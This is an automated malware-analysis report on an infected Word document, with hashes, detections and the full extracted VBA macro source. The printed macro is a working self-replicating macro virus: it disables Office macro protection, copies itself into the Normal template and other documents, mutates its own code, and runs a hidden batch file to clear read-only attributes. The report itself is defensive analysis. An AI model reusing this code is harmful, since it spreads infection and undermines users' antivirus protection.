Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c859f254b6fb25fb…

MALICIOUS

Office (OLE)

85.0 KB Created: 2006-08-18 16:16:00 Authoring application: Microsoft Word 10.0 First seen: 2012-09-15
MD5: 2b6bced726c6d76a15ec7bbbace15a16 SHA-1: 3c65b248b2f67c9f66e0f01291522eaa65dbed05 SHA-256: c859f254b6fb25fb1bf70959d66a0af60beec364a39d7f15ec683b8364a93e4d
142 Risk Score

Heuristics 4

  • ClamAV: Doc.Trojan.Ded-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
     _
         ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines i * 2, d
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.drudgereport.com In document text (OLE body)
    • http://www.apple.com/DTDs/PropertyList-1.0.dtdIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3961 bytes
SHA-256: bd728020a531ca9842166abfa611e270128485c47a198db81637017181cfc349
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
 _
        Private Sub CommandButton1_Click()

       End Sub
'87.14458
 _
    Private Sub Document_Close()

 _
             On Error GoTo skam

 _
           Options.VirusProtection = unimplemented

 _
  SWL

             ABS99
'1.570392
skam:
'4.564917
              End Sub
'41.27668
 _
Private Sub SWL()

          If Not ActiveDocument. _
VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

 _
For i = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines

 _
         d = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

 _
        If Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

            While Mid(d, _
Len(d) - 1, 2) = " _"

           i = i + _
1

  d = Left(d, Len(d) _
- 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

 _
   Wend

          d = e(d)
'23.52822
 _
         ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines i * 2, d

 _
          End If

 _
         Next i

 _
   ActiveDocument.SaveAs AddToRecentFiles:=False

 _
       End If

 _
         End Sub

            Private _
Sub ABS99()

              If _
Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

 _
  f (NormalTemplate.FullName)

           For i _
= 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

 _
   d = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

 _
  If Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

 _
          While Mid(d, Len(d) - 1, 2) = " _"

  i = i + 1
'6.585103
 _
       d = Left(d, Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

          Wend
'4.811889
   d _
= e(d)

 NormalTemplate.VBProject. _
VBComponents(1).CodeModule.InsertLines i * 2, d

 _
       End If

 _
     Next i

 _
            NormalTemplate.Save

 _
End If

 _
          End Sub

  Private Function e(aString) As _
String

 _
     For i = 1 To Len(aString) - 1

         While Mid(aString, i, 2) = " "
'7.798058
 _
         aString = Left(aString, i) & Right(aString, Len(aString) - i - 1)

       Wend
'57.48649
 _
  If Mid(aString, i, 1) = "." Then

 _
           If Not Mid(aString, i - 1, 1) = Chr$(34) And Not Mid(aString, i + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

 _
           If Not Mid(aString, i + 1, 1) = Chr$(34) Then

 _
  e = Left(aString, i - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - i)

    For J _
= 1 To Int(15 * Rnd)

 _
        e = " " & e

 _
Next J

 _
     Exit Function

                   End If
'18.81318
            End If
'82.7899
 _
          Else

 _
    If Mid(aString, i, 1) = " " And Int(3 * Rnd) = 1 And i > 1 Then

 _
      If Not Mid(aString, i + 1, 1) = Chr$(34) And Not Mid(aString, i - 1, 1) = Chr$(34) Then

      e _
= Left(aString, i - 1) & " _" & Chr$(13) & Right(aString, Len(aString) - i)

 _
        For J = 1 To Int(15 * Rnd)

 _
  e = " " & e

 _
  Next J

 _
      Exit Function

              End _
If

 _
     End If

     End If
'90.43737
 _
    Next i

 _
      e = aString & Chr$(13) & "'" & (100 * Rnd)

 _
                   Count = Int(15 * Rnd)

 _
For J = 1 To Count

 _
            e = " " & e

 _
  Next J

 _
 End Function

            Private Sub f(fName)
'43.16001
 _
If GetAttr(fName) And vbReadOnly Then

 _
Open Dir(fName) & ".bat" For Append As #1

              Print _
#1, "Attrib " & "-r " & Chr$(34) & fName & Chr$(34)

 _
        Print #1, "del " & Chr$(34) & Dir(fName) & ".bat" & Chr$(34)

 _
   Close #1

 _
    shellResult = Shell(Dir(fName) & ".bat", vbHide)

 _
         End If

 _
      End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.